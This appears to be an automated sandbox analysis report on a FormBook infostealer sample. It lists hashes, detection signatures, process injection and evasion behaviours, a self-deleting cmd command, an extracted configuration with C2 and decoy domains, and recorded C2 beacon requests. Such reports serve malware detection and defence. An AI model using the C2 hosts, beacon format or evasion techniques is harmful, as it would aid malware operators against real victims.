Windows Analysis Report
jqPZZhDmjh.exe

Overview

General Information

Sample name: jqPZZhDmjh.exe (renamed because original name is a hash value)
Original sample name: ca6d88ac1635e12fbcea10c6db09f229893ae4d2645830481625dcd4c465e498.exe
Analysis ID: 1392769
MD5: c4127213fc83e9b8d166d5731bac598a
SHA1: c54a87820173ca9fae8809dcc7e99f54b2dac173
SHA256: ca6d88ac1635e12fbcea10c6db09f229893ae4d2645830481625dcd4c465e498
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • jqPZZhDmjh.exe (PID: 6964 cmdline: C:\Users\user\Desktop\jqPZZhDmjh.exe MD5: C4127213FC83E9B8D166D5731BAC598A)
    • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • raserver.exe (PID: 2656 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: D1053D114847677185F248FF98C3F255)
        • cmd.exe (PID: 2828 cmdline: /c del "C:\Users\user\Desktop\jqPZZhDmjh.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.venitro.com/gy14/"], "decoy": ["mavbam.com", "theanhedonia.com", "budgetnurseries.com", "buflitr.com", "alqamarhotel.com", "2660348.top", "123bu6.shop", "v72999.com", "yzyz841.xyz", "247fracing.com", "naples.beauty", "twinklethrive.com", "loscaseros.com", "creditspisatylegko.site", "sgyy3ej2dgwesb5.com", "ufocafe.net", "techn9nehollywoodundead.com", "truedatalab.com", "alterdpxlmarketing.com", "harborspringsfire.com", "soulheroes.online", "tryscriptify.com", "collline.com", "tulisanemas.com", "thelectricandsolar.com", "jokergiftcard.buzz", "sciencemediainstitute.com", "loading-231412.info", "ampsportss.com", "dianetion.com", "169cc.xyz", "zezfhys.com", "smnyg.com", "elenorbet327.com", "whatsapp1.autos", "0854n5.shop", "jxscols.top", "camelpmkrf.com", "myxtremecleanshq.services", "beautyloungebydede.online", "artbydianayorktownva.com", "functional-yarns.com", "accepted6.com", "ug19bklo.com", "roelofsen.online", "batuoe.com", "amiciperlacoda.com", "883831.com", "qieqyt.xyz", "vendorato.online", "6733633.com", "stadtliche-arbeit.info", "survivordental.com", "mrbmed.com", "elbt-ag.com", "mtdiyx.xyz", "mediayoki.site", "zom11.com", "biosif.com", "aicashu.com", "inovarevending.com", "8x101n.xyz", "ioherstrulybeauty.com", "mosaica.online"]}
Source | Rule | Description | Author | Strings
jqPZZhDmjh.exe | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
jqPZZhDmjh.exe | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
jqPZZhDmjh.exe | Windows_Trojan_Formbook_1112e116 | unknown | unknown
jqPZZhDmjh.exe | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
jqPZZhDmjh.exe | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
Source | Rule | Description | Author | Strings
00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
Source | Rule | Description | Author | Strings
0.2.jqPZZhDmjh.exe.970000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.jqPZZhDmjh.exe.970000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0.2.jqPZZhDmjh.exe.970000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
0.2.jqPZZhDmjh.exe.970000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
0.2.jqPZZhDmjh.exe.970000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
              No Sigma rule has matched
              No Snort rule has matched

              AV Detection

              Source: jqPZZhDmjh.exe, Avira: detected
              Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, Malware Configuration Extractor: FormBook
              Source: www.theanhedonia.com, Virustotal: Detection: 9%
              Source: http://www.theanhedonia.com/gy14/www.soulheroes.online, Virustotal: Detection: 8%
              Source: jqPZZhDmjh.exe, ReversingLabs: Detection: 89%
              Source: jqPZZhDmjh.exe, Virustotal: Detection: 71%
              Source: Yara match, File source: jqPZZhDmjh.exe, type: SAMPLE
              Source: Yara match, File source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE
              Source: jqPZZhDmjh.exe, Joe Sandbox ML: detected
              Source: jqPZZhDmjh.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: jqPZZhDmjh.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: wntdll.pdbUGP source: jqPZZhDmjh.exe, 00000000.00000003.2053878549.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000003.2051833702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000002.2119541533.000000000171E000.00000040.00001000.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300751404.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000003.2120183024.00000000041F7000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300751404.000000000453E000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000003.2117914858.0000000004043000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: jqPZZhDmjh.exe, jqPZZhDmjh.exe, 00000000.00000003.2053878549.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000003.2051833702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000002.2119541533.000000000171E000.00000040.00001000.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, raserver.exe, 00000003.00000002.3300751404.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000003.2120183024.00000000041F7000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300751404.000000000453E000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000003.2117914858.0000000004043000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RAServer.pdb source: jqPZZhDmjh.exe, 00000000.00000002.2120687232.0000000001920000.00000040.10000000.00040000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000003.2117296757.0000000001060000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300330935.0000000000880000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: RAServer.pdbGCTL source: jqPZZhDmjh.exe, 00000000.00000002.2120687232.0000000001920000.00000040.10000000.00040000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000003.2117296757.0000000001060000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300330935.0000000000880000.00000040.80000000.00040000.00000000.sdmp
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe, Code function: 0_2_00987287 4x nop then pop esi
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe, Code function: 0_2_009872D9 4x nop then pop esi
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe, Code function: 0_2_00986CC5 4x nop then pop edi
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe, Code function: 0_2_0097E46A 4x nop then pop edi
              Source: C:\Windows\SysWOW64\raserver.exe, Code function: 3_2_004CE46A 4x nop then pop edi
              Source: C:\Windows\SysWOW64\raserver.exe, Code function: 3_2_004D6CC5 4x nop then pop edi
              Source: C:\Windows\SysWOW64\raserver.exe, Code function: 3_2_004D72D9 4x nop then pop esi
              Source: C:\Windows\SysWOW64\raserver.exe, Code function: 3_2_004D7287 4x nop then pop esi

              Networking

              Source: C:\Windows\explorer.exe, Network Connect: 103.224.212.212 80
              Source: C:\Windows\explorer.exe, Network Connect: 104.21.34.218 80
              Source: Malware configuration extractor, URLs: www.venitro.com/gy14/
              Source: global traffic, HTTP traffic detected: GET /gy14/?Szu8Zp=FTAq1zBP6NNjQjBPydRh3L/j4TP0vWodDfrtqSKklHyFdw4ikOglIB/U9f3VYzUg75agPLVEuw==&3fzlqX=DtjxV HTTP/1.1 Host: www.123bu6.shop Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global traffic, HTTP traffic detected: GET /gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs60bzmHjgtnYtuzz0MQ==&3fzlqX=DtjxV HTTP/1.1 Host: www.theanhedonia.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: Joe Sandbox View, IP Address: 103.224.212.212
              Source: Joe Sandbox View, ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
              Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\explorer.exe, Code function: 2_2_0DF7CF82 getaddrinfo,setsockopt,recv
              Source: unknown, DNS traffic detected: queries for: www.123bu6.shop
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.artbydianayorktownva.com/gy14/www.mrbmed.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.artbydianayorktownva.comReferer:
              Source: explorer.exe, 00000002.00000000.2073710031.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.budgetnurseries.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.budgetnurseries.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.budgetnurseries.com/gy14/www.mtdiyx.xyz
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.budgetnurseries.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elbt-ag.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elbt-ag.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elbt-ag.com/gy14/www.twinklethrive.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elbt-ag.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mrbmed.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mrbmed.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mrbmed.com/gy14/www.whatsapp1.autos
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mrbmed.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz/gy14/www.elbt-ag.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyzReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.roelofsen.online
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.roelofsen.online/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.roelofsen.online/gy14/www.truedatalab.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.roelofsen.onlineReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sgyy3ej2dgwesb5.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sgyy3ej2dgwesb5.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sgyy3ej2dgwesb5.com/gy14/www.883831.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sgyy3ej2dgwesb5.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soulheroes.online
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soulheroes.online/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soulheroes.online/gy14/www.roelofsen.online
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soulheroes.onlineReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theanhedonia.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theanhedonia.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theanhedonia.com/gy14/www.soulheroes.online
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theanhedonia.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.truedatalab.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.truedatalab.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.truedatalab.com/gy14/www.budgetnurseries.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.truedatalab.comReferer:
